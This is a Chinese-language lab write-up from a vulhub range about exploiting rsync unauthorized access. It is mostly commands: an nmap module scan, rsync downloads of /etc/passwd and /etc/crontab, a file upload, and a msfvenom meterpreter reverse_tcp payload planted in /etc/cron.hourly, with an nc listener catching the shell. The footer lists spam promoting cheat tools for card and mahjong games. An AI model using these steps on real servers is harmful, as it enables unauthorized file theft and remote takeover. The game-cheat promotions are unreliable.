【vulhub靶场之rsync关】
创始人
2024-09-25 14:23:46
0

一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞

nmap -p 873 --script rsync-list-modules 加IP地址

查看到是有漏洞的模块的

image-20240805155648842

二、使用rsync命令连接并读取文件

image-20240805160205714

查看src目录里面的信息。

image-20240805160717745

三、对系统中的敏感文件进行下载——/etc/passwd

执行命令:

rsync rsync://43.136.68.40:873/src/etc/passwd /home/kali/Desktop/

image-20240805181956106

查看下载下的文件

cat /home/kali/Desktop/passwd

image-20240805182157837

也可在桌面双击打开

image-20240805182307279

四、在本机使用命令创建一个phpinfo文件

随便往里面写一个文件测试一下,例如phpinfo.php,如下命令在kali创建一个文件。

 echo "" > phpinfo.php 

将文件再上传到受害者,也就是靶场环境里。

rsync ./phpinfo.php rsync://43.136.68.40:873/src/home/

查看一下有没有写进去

rsync rsync://43.136.68.40:873/src/home/

成功写进去了文件。

image-20240805190256114

五、反弹shell

查看定时任务

rsync://43.136.68.40:873/src/etc/crontab

将文件下载下到kali

rsync rsync://43.136.68.40:873/src/etc/crontab /home/kali/Desktop ​

查看一下文件里面的内容,里面的大概意思就是每17分钟调用一次/etc/cron.hourly

image-20240805191157593

在kali机子上拉取一个shell文件

语法:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=自己攻击机的地址 lport=4444 --f elf -o shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.189.150 lport=4444 --f elf -o shell

image-20240805212012471

将shell文件提权

chmod 777 shell

六:将shell上传到目标靶机中

命令语句:

rsync -av /home/kali/Desktop/shell rsync://43.136.68.40:873/src/etc/cron.hourly

image-20240805213313658

七、开启kali监听端口

nc -lvvp 4444

等待17分钟后,查看监听到的信息,代表连接成功。

相关内容

热门资讯

热点推荐!!雀神辅助器在哪里下... 热点推荐!!雀神辅助器在哪里下载(透明挂)外挂透明挂辅助软件(2024已更新)(哔哩哔哩);1、点击...
玩家必备教程!小程序雀神麻将修... 玩家必备教程!小程序雀神麻将修改器(辅助挂)好像真的是有挂(2026已更新)(哔哩哔哩)小程序雀神麻...
科普!永和备厅有挂吗(透视)透... 科普!永和备厅有挂吗(透视)透明挂透视辅助脚本(2025已更新)(哔哩哔哩)永和备厅有挂吗软件透明挂...
九分钟科普!填大坑辅助器免费安... 九分钟科普!填大坑辅助器免费安装,gg扑克果然真的有挂,曝光教程(有挂秘籍)1、每一步都需要思考,不...
热点推荐!熊猫麻将有透明挂吗(... 热点推荐!熊猫麻将有透明挂吗(辅助挂)真是是真的有挂(2026已更新)(哔哩哔哩);运熊猫麻将有透明...
指导大家!小宝跑得快有挂吗(透... 指导大家!小宝跑得快有挂吗(透视)透视脚本辅助神器(2022已更新)(哔哩哔哩)小宝跑得快有挂吗是一...
4分钟科普!兴动娱乐辅助器,聚... 4分钟科普!兴动娱乐辅助器,聚星扑克德州果然存在有挂,2025教程(有挂教学)1、操作简单,无需注册...
实测分享!闲来红中麻将怎么提升... 实测分享!闲来红中麻将怎么提升胜率(辅助挂)总是真的有挂(2024已更新)(哔哩哔哩)1、每一步都需...
推荐十款!!安徽闲来麻将有挂吗... 推荐十款!!安徽闲来麻将有挂吗(透视)透明挂透视辅助挂(2024已更新)(哔哩哔哩)1、进入到安徽闲...
3分钟实锤!途游有辅助挂是真的... 3分钟实锤!途游有辅助挂是真的吗,拱趴大菠萝原来有挂,透牌教程(有挂脚本)1、途游有辅助挂是真的吗a...